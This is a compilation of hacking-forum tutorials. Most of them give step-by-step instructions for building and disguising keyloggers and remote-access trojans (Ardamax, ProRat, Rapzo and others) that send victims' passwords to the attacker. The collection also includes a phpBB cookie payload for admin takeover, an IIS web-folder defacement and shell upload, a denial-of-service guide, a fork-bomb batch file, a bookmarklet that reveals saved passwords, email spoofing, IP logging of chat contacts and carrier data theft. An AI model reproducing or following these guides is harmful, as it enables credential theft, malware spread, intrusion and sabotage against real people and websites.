How To Make a email spoofing site


Email spoofing is a hack in which you send someone email and the your ID is what ever you want, that means you can send someone email from Barrack H. Obama's email account without logging into it. This is really old hack but was really difficult in the beginning


So lets make our own email spoofer site, I will guide you step by step!


STEP 1: Make an account on www.000webhost.com


STEP 2: Download this php script: http://www.mediafire.com/?vltc0283wdekj8l


STEP 3: Register any sub-domain in www.000webhost.com and goto its CPanel from List Accounts.


STEP 4: Then open File Manager under Files.


STEP 5: Here goto public_html folder and upload the php file that you have just downloaded.




Thats all your Email spoofer will be functioning just goto the sub-domain that you have registered.

How to Hack A phpBB Forum


                                                        Hacking A Forum

1. Just visit the forums in Mozilla FireFox.

2. Close the browser.

3. Open cookies.txt (located at “C:\Documents and Settings\username\Application\
Data\MozillaFirefox\Profiles\blah.default”).
You have to view hidden files and folders to see Application Data.

4. Look for something like this :

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
—————————————————————————————————————//
127.0.0.1 is the domain for the forum. a%3A0%3A%7B%7D is the cookie
data. It says you are a visitor.

5. Open cookies.txt with your text editor, I used WordPad, and replace
—————————————————————————————————————
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
—————————————————————————————————————//
with
—————————————————————————————————————
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
—————————————————————————————————————//
save cookies.txt.

6. Open your browser again and go directly to the forums. You should
now be logged in as an admin! This doesn’t always work though, as some
forums have security patches installed.
Destroy everything by going to the admin control panel and delete
every forum. Then do an IP ban on the admin..

Just kiddin, Do whatever U like …..






H-A-C-K ANY ACCOUNTS ( fb/mig33/yahoo/g-mail )


 I MAKE THIS TUTORIAL ONLY FOR THOSE WHO "DON'T KNOW" OR "FIRST TIME" HOW TO SETUP A KEY-LOGGER IN A EASE MOOD AND HACK ANY  1 COMPUTER.



1st of all download Ardamax Keylogger 3.8.9 Full Version (with Remote Installation) + Serial 

 Download : http://www.mediafire.com/?n440t8jsggufu4d

::::Serial Code ::::::

Name: Popescu Marian

Serial: 083A-E649-5E15


STEP 1 : 1. Once you've downloaded it, you'll see a little notepad icon in your taskbar, now right-hand click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says

Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'


STEP 2 : Now your going to make the Keylogger Engine (The thing you give to your victim). Click 'Remote Installation...', now, click 'next' until you get to Appearences.

Now that your at Appearences, click 'Additional components' and un-tick 'Log Viewer' like done in the screenshot, then click Next.

STEP 3 : Now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

STEP 4 : Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.


STEP 5 : Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only if log size exceeds', once thats done, it should all look like it does in this screenshot.


STEP 6 : Now you should be at 'FTP', create a free account at http://www.drivehq.com/secure/FreeSignup...m=storage, then make sure your at 'Online Storage', then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone).


STEP 7 : Now change the icon from your pc and make your victim fool. Any Icon you want.See a snap that i choose below. Then click netxt to finished ::



STEP 8 : Now you need a good Fud crypter(Fully Undectable) to bypass antivirus to your victim's pc. See a snapshot how i crypt the server(FUD) to get a fud crypter like this 1 you may check my page name : "CRYPTER AND BINDER"



THATS ALL . HAVE FUN .....THANK YOU FOR READING 

HERE IS A WORKING SNAP GIVEN FOR YOU GUYS...SEE HOW I GET ALL INFORMATIONS//SNAPS//PASSWORDS OF MY VICTIMS FROM THEIR COMPUTER'S :

How to bypass Adf.ly Url shorten advertisements


                          How to bypass Adf.ly Url shorten advertisements 

There was very annoying when we want to download movies or games that owner set the download link with the adf.ly. Adf.ly was used to embed with the download link to earn money. But this adf.ly extension make our download process so slow and delay. This is one of my solution how to remove adf.ly link.



How to bypass Adf.ly Url shorten advertisements:

To bypass/hack Adf.ly, you need to have Firefox browser with Greasemonkey installed. You can install Greasemonkeyfirefox addon, if you haven't installed yet. 

Download : https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ 

1. Go to Adf.ly Hacker script page to bypass Adf.ly advertisements.

link : http://userscripts.org/scripts/show/89322

2. Hit on Install and confirm the script installation in your Greasemonkey.

3. Now, whenever you'll click on any Adf.ly shortened link(eg: http://adf.ly/DuLN) , you won't see any timer or counter of 5 seconds. The actual intended page will appear.

Finish..that all.Thank you for reading.

Sharecash Direct download

How to use it:

This is coded in VB.NET so it requires .NET Framework to run. It also requires Internet Explorer installed.

First, open the $harecash Downloader and then type the mirror link in the textbox.

Then press "Navigate" and wait for 10-15 seconds.

Then press "Download" and your file should be download.


Download :
http://uppit.com/5r6q0j3nvgr0/Downloader.rar
  OR
http://uploading.com/files/dc94m59f/Downloader.rar/

How to Hack Website with IIS Exploit {Tutorial}


In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest way to Hack any site.

STEP 1: Click on Start button and open "RUN".


STEP 2: Now Type this in RUN

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}



 Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".


STEP 5: Now Click on "Finish"

STEP 6: Now the folder will appear. You can open it and put any deface page or anything.


STEP 7: I put text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.



Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded] "

Airtel Free 3G Hack : Use Free Airtel 3G Internet For Your Computer


       Airtel 3G Hack : Free Airtel 3G Internet For Your Computer

Step 1: Connect via AIRTELMMS.COM(MOST IMPORTANT)..

IF U WANT IT EASY THN GO TO DEVICE MANAGER..SELECT THE MODEM..IN ADVANCE TAB..IN COMMAND SIMPLY PASTE { +CGDCONT=1,"IP","AIRTELMMS.COM" } WITHOUT BRACKETS

Step 2: CREATE A DIALUP CONNECTION....

Step 3: IT WILL CONNECT...AS NO NETWORK ACCESS

Step 4: GO TO CONNECT TO..U WILL SEE CONNECTED...

Step 5: RIGHT CLICK ...LEFT CLICK PROPERTIES

Step 6: GO TO NETWORKING TAB

Step 7: CHECK ALL THE CHECKBOXES

Step 8: CLICK ON INTERNET PROTOCOL VERSION(TCP/IP)

Step 9: CLICK ON PROPERTIES

Step 10: SELECT USE THE FOLLOWING DNS SERVER ADDRESSES

Step 11: ENTER ANY FREE DNS SERVER..I RECOMMEND
156.154.70.1
202.138.96.3


Step 12: CLICK OK

Step 13:AGAIN OK

Step 14: A MSG APPEARS " SETTING WILL TAKE PLACE NEXT TYM U DIAL IT" CLICK OK

Step 15: GO TO START> CONNECT TO > DISCONNECT

Step 16: RECONNECT

Step 17: OPEN ANY WEBSITE ...........Enjoy Free Airtel 3G...

Above trick works at any balance with No Balance Deduction...

CRASH A COMPUTER USNIG SMALL PROGRAM.





1) Open notepad

 2) type the following code ::

start
crash.bat


3) u must save it as crash.bat

4)now hit enter in that file..

 then :innocent::innocent::innocent::

NOTE: u have to save that filename as u entered in that 2 nd line of the code..dont fear...its not a threat... it simply will open infinite number of cmd prompts... 

How to Hack E-Mail Account Password - Email Hacking Software

How to Hack E-Mail Account Password - Email Hacking Software
Now you know that there are many ways to hack email password, like bruteforcing, social engineering or Reverting, but the main two methods used to hack email passwords are Remote Keylogging and Phishing. In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

Download ProRat here: http://www.prorat.net/downloads.php

2. Open up the program. You should see the following:


3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.


8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.


12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.


As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

Cmd hacking commands


                                      Cmd hacking commands 


I am Sure u guys Know All these commands.... I want to Help The Beginers.. So i am Posting This....

Useful Things to do on CMD!

First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.

Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

Back to commands:

nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig


In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

ping x.x.x.x (x is the IP address)

or

ping http://www.whatever.com (http://www.whatever.com is the website you want to ping, but you don't know the IP)

OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup http://www.whatever.com (http://www.whatever.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs

nslookup (enter)
set type=mx (enter)
yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showth...&threadid=2360

3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

tracert x.x.x.x (x is the IP address)

or

tracert http://www.whatever.com (http://www.whatever.com is the website you don't know the IP)

4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

arp -a

5) route : This command will show you the routing table, gateway, interface and metric.

Code:
route print


6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.

Code:
ipconfig
or

Code:
ipconfig /all

this command will give all that info but for all networks you might have it.

Also, in case you have a dynamic IP and want to change it, then type...

Code:
ipconfig /release (this will release your IP)

ipconfig /renew (this will renew your iP)

OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.

7) netstat : This command will show you connection to your box.

Code:
netstat

or

Code:
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above)

net view x.x.x.x or computername (will list the available sharing folders on the target box)


Now some hints:

Code:
net use \ipaddressipc$ "" /user:administrator

(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

Code:
net use K: \computernameC$
(this will create a virtual drive on your "my computer" folder)

OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set.

And least but not last, the "help" command.

Quote:
whatevercommand /help

or

Quote:
whatevercommand /?


This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.


 hints :: HACKING IS NOT SO EASY SO GUYS BEFORE HACKING READ THE ARTICLES CAREFULLY  ANN FULLY THE TRY TO HACK...

Bypass Compulsory registration


Tonight when I am surf the internet then i am found a site who help you bypass the Compulsory
Registration for enter the website.

This site provide you many user id with password by which use you enter in the website and enjoy free surfing without registration.

link: http://bugmenot.com/

How to View Hidden Password behind ****

How to View Hidden Password behind ****


You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password.

After opening the web page paste the JavaScript given below in the address bar and hit enter :

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;

%20F%20=%20document.forms;%20for(j=0;%20j

%20{%20f%20=%20F[j];%20for%20(i=0;%20i

%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)

%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if

%20(s)%20alert(%22Passwords%20in%20forms%20on%20this

%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are

%20no%20passwords%20in%20forms%20on%20this

%20page.%22);})();



DOS TUTORIAL How to crash small websites using RDOS



                                              DOS TUTORIAL
                  How to crash small websites using RDOS


Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers.


NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible in any case. If you are not agree, please leave this website without reading further tutorial

You need:

1. Port Scanner : http://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/Advanced-IP-scanner.shtml

2.  rDOS : http://www.ziddu.com/download/14061252/rDos.zip.html

3. Ip Hiding tool : http://www.ziddu.com/download/13388927/Quick_Hide_IP_1.0_portable.rar.html

Follow these steps:

1: First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com
see the snap :


Now you have the IP address of the website.

2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P
otherwise you can crash this website.

3: Now open your rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.

Hints : 1 :: After entering the IP..it will do all work, you don't need to do anything.
          2 :: This kind of hacking tools will always shown as virus by antivirus... disable antivirus before try

Get IP from MSN/AIM/gtalk/facebook/all chats



 Found a great website that logs IPs and gives you the lat/long./isp.
1)Create Account
http://www.chatrack.frihost.net/index-1.php
2)Get one of the links and tell someone on AIM or whatever to click it, choose any of the images and tell them you painted it or some stupid shit like that.
3)When they look at the image, it logs their IP.
4)Bonus points:
-Tell them its animated and 20 seconds in it will change, this allows the website to have time to ensure all their info is retrieved.

How It Works?

When some one click the Tracking code, which you present in a chat room, his/her IP ADDRESS is stored. IP Look up, identify "Country", "Near city", etc and presented to you as Track Result .

Hack email using keylogger star tools(100% free)

 Step: 1 Firs You should download star tools key logger  for download :

http://www.mediafire.com/?m6fb798t4p5y1ur

Step: 2 Extract rar file and run star tools: after hit will open a bok then go to tools and click on keylogger



 Step:3 Enter Your gmail id and password and hit build keylogger,



 After enter email and pass click on build keylogger, after click a server.exe file created automatic in the same directory.

Step 4: send this server file send to your victom. when he/she will run this file his all keystrokes will send in your gmail account automatic.....

thats all Enjoy....:)



Hack Yahoo ID


It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are two types of software by which u can make your own spyware {server]
U can download anyone and use it.

1. Y-Jacked
Code:
http://rapidshare.com/files/42244305/Y_Jacked.rar.html

2. SH-Yahoo pass sender
Code:
http://rapidshare.com/files/42244485/S-H_Yahoo_Pass_Sender_1.1.zip

Rapzo Keylogger 2011, Hack any email with this keylogger Rapzo keylogger 1.5 public Edition full

Rapzo Keylogger, Hack any email with this keylogger Rapzo keylogger 1.5 public Edition (( full Tutorial )). 

I post this tutorial in front page only for request . So guys read this article and you can hack any slaves pc.

If you don't get me then check this video how to setup : 

http://www.youtube.com/watch?v=iZcnOt-7lQ8 



what the things you will need to hack accounts with rapzo keylogger.
 

  1. Rapzo Keylogger
  2. Resource Hacker
  3. winrar (or any compressing tool)
  4. Microsoft net frame work
  5.  A Hosting account (for share this file)

Now Learn Tutorial
1. 1st of all download Download Rapzo keylogger and Resource Hacker
2. Note You need to install Microsoft Netframe work, 
 



  Microsoft Netframe : http://www.microsoft.com/net

Keylogger Setting or how to use keylogger
 
3.Extract rapzo keylogger file into your hard drive and ope rapzo logger.exe
4. go to rapzo keylogger opetion
.Click on Enable and check it,
6. if you have not email, then go to google.com click on gmail and make a gmail account, after all enter your gmail username and password. 

Example:
 
Enter username box (umerrock@live.com)
Enter Pass box (same pass which you chose)
Logs send to box (same email umerrock@live.com)
Now click on Test me.
if it will show you tha email is correct then you can check your mails a test mail will in your inbox,
7. Now go to option and check/tick the following components,
(i) tick on encrypt info (it will send you ip adress and system information)
(ii) tick on screen logger (it will take a screenshot from victim computer and send you in email inbox)
(iii) tick on stealers it will record passwords/keystorkes 

 

  When you will Select on Stealers a new Box will open then check on Enable all and click ok Save Settings.


After Options Go to Mail Setup and Enter your Amail and password
Enter Info
Enter UserName Box (yourgmail id)
Enter Password Box (Enter ur orignal password)
Logs Send to Box (Enter your Same Gmail id) 


 After all Click on Test me if the box show like the pic below then ur all setting is correct otherwise check ur email and password.


8.After all last step is this, click on build server, a server file will be created autmatic in same directory. 


Guyz this is Additional Step,
Now run the resource Hacker
when you open resource hacker then go to file then click on open then open the server file which you created by Rapzo keylogger.


 when you will open server file then click on version info then click on 1 then click on "0" there you can see file description is Hijackthisfile reaplace it with Microsoft



then click on complete script and go to file and save it as anyfilename with the extension of jpg


Thats it now you can bind it with any jepg image file with easy binder and upload it any hosting site like mediafire.com and share with your victim when he/she will run then you can hack it.